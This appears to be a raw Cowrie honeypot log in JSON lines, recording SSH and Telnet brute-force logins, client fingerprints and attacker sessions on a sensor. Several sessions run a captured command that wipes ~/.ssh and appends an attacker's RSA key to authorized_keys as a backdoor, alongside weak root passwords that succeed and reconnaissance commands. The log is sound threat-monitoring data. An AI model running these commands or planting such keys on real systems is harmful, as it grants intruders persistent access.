{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:04:08.549636Z","src_ip":"212.227.125.160","session":"a1ef776dc693"}
{"eventid":"cowrie.login.failed","username":"app","password":"123456","message":"login attempt [app/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:04:08.770029Z","src_ip":"212.227.125.160","session":"a1ef776dc693"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:09.184832Z","src_ip":"212.227.235.229","session":"b6729a86691e"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:09.343321Z","src_ip":"212.227.235.229","session":"52903ae063cc"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:09.962055Z","src_ip":"212.227.125.160","session":"a1ef776dc693"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41932,"dst_ip":"1.2.3.4","dst_port":22,"session":"90a925898290","protocol":"ssh","message":"New connection: 212.227.235.229:41932 (1.2.3.4:22) [session: 90a925898290]","sensor":"my-vps","timestamp":"2025-08-31T01:04:16.492952Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:04:16.493849Z","src_ip":"212.227.235.229","session":"90a925898290"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:04:16.561048Z","src_ip":"212.227.235.229","session":"90a925898290"}
{"eventid":"cowrie.login.success","username":"root","password":"Aq1sw2de3","message":"login attempt [root/Aq1sw2de3] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:04:16.870188Z","src_ip":"212.227.235.229","session":"90a925898290"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:04:17.024056Z","src_ip":"212.227.235.229","session":"90a925898290"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:04:17.024746Z","src_ip":"212.227.235.229","session":"90a925898290"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:04:17.025914Z","src_ip":"212.227.235.229","session":"90a925898290"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:17.097331Z","src_ip":"212.227.235.229","session":"90a925898290"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:04:17.291012Z","src_ip":"212.227.235.229","session":"90a925898290"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:04:17.291822Z","src_ip":"212.227.235.229","session":"90a925898290"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:04:17.360304Z","src_ip":"212.227.235.229","session":"90a925898290"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:17.361262Z","src_ip":"212.227.235.229","session":"90a925898290"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42364,"dst_ip":"1.2.3.4","dst_port":22,"session":"d211f91d6591","protocol":"ssh","message":"New connection: 212.227.235.229:42364 (1.2.3.4:22) [session: d211f91d6591]","sensor":"my-vps","timestamp":"2025-08-31T01:04:17.425021Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:04:17.425753Z","src_ip":"212.227.235.229","session":"d211f91d6591"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:04:17.492556Z","src_ip":"212.227.235.229","session":"d211f91d6591"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:04:17.799471Z","src_ip":"212.227.235.229","session":"d211f91d6591"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:18.869608Z","src_ip":"212.227.235.229","session":"d211f91d6591"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52896,"dst_ip":"1.2.3.4","dst_port":22,"session":"da03bd8db96c","protocol":"ssh","message":"New connection: 212.227.125.160:52896 (1.2.3.4:22) [session: da03bd8db96c]","sensor":"my-vps","timestamp":"2025-08-31T01:04:18.924379Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:04:18.925422Z","src_ip":"212.227.125.160","session":"da03bd8db96c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43170,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8a4a4c0a72e","protocol":"ssh","message":"New connection: 212.227.235.229:43170 (1.2.3.4:22) [session: a8a4a4c0a72e]","sensor":"my-vps","timestamp":"2025-08-31T01:04:18.935928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:04:18.936705Z","src_ip":"212.227.235.229","session":"a8a4a4c0a72e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:04:18.998355Z","src_ip":"212.227.125.160","session":"da03bd8db96c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:04:19.003082Z","src_ip":"212.227.235.229","session":"a8a4a4c0a72e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60617,"dst_ip":"1.2.3.4","dst_port":23,"session":"519f43cb3b7e","protocol":"telnet","message":"New connection: 212.227.125.160:60617 (1.2.3.4:23) [session: 519f43cb3b7e]","sensor":"my-vps","timestamp":"2025-08-31T01:04:19.257869Z"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:04:19.313871Z","src_ip":"212.227.235.229","session":"a8a4a4c0a72e"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:19.381331Z","src_ip":"212.227.235.229","session":"a8a4a4c0a72e"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:19.382278Z","src_ip":"212.227.235.229","session":"90a925898290"}
{"eventid":"cowrie.login.success","username":"root","password":"Password","message":"login attempt [root/Password] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:04:19.396574Z","src_ip":"212.227.125.160","session":"da03bd8db96c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:04:19.627997Z","src_ip":"212.227.125.160","session":"da03bd8db96c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:04:19.628686Z","src_ip":"212.227.125.160","session":"da03bd8db96c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:19.702866Z","src_ip":"212.227.125.160","session":"da03bd8db96c"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:19.703924Z","src_ip":"212.227.125.160","session":"da03bd8db96c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43176,"dst_ip":"1.2.3.4","dst_port":22,"session":"92a53daa40f5","protocol":"ssh","message":"New connection: 212.227.235.229:43176 (1.2.3.4:22) [session: 92a53daa40f5]","sensor":"my-vps","timestamp":"2025-08-31T01:04:20.126371Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:04:20.129735Z","src_ip":"212.227.235.229","session":"92a53daa40f5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:04:20.372665Z","src_ip":"212.227.235.229","session":"92a53daa40f5"}
{"eventid":"cowrie.login.success","username":"root","password":"77777","message":"login attempt [root/77777] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:04:21.323982Z","src_ip":"212.227.235.229","session":"92a53daa40f5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:04:21.826028Z","src_ip":"212.227.235.229","session":"92a53daa40f5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:04:21.826814Z","src_ip":"212.227.235.229","session":"92a53daa40f5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:04:21.828078Z","src_ip":"212.227.235.229","session":"92a53daa40f5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:22.066396Z","src_ip":"212.227.235.229","session":"92a53daa40f5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:04:23.021416Z","src_ip":"212.227.235.229","session":"92a53daa40f5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:04:23.022083Z","src_ip":"212.227.235.229","session":"92a53daa40f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59116,"dst_ip":"1.2.3.4","dst_port":22,"session":"aeec80e37308","protocol":"ssh","message":"New connection: 212.227.125.160:59116 (1.2.3.4:22) [session: aeec80e37308]","sensor":"my-vps","timestamp":"2025-08-31T01:04:23.024433Z"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:04:23.262073Z","src_ip":"212.227.235.229","session":"92a53daa40f5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:04:23.263250Z","src_ip":"212.227.235.229","session":"92a53daa40f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44436,"dst_ip":"1.2.3.4","dst_port":22,"session":"46a7fa27f8f9","protocol":"ssh","message":"New connection: 212.227.235.229:44436 (1.2.3.4:22) [session: 46a7fa27f8f9]","sensor":"my-vps","timestamp":"2025-08-31T01:04:23.493811Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:04:23.502225Z","src_ip":"212.227.235.229","session":"46a7fa27f8f9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""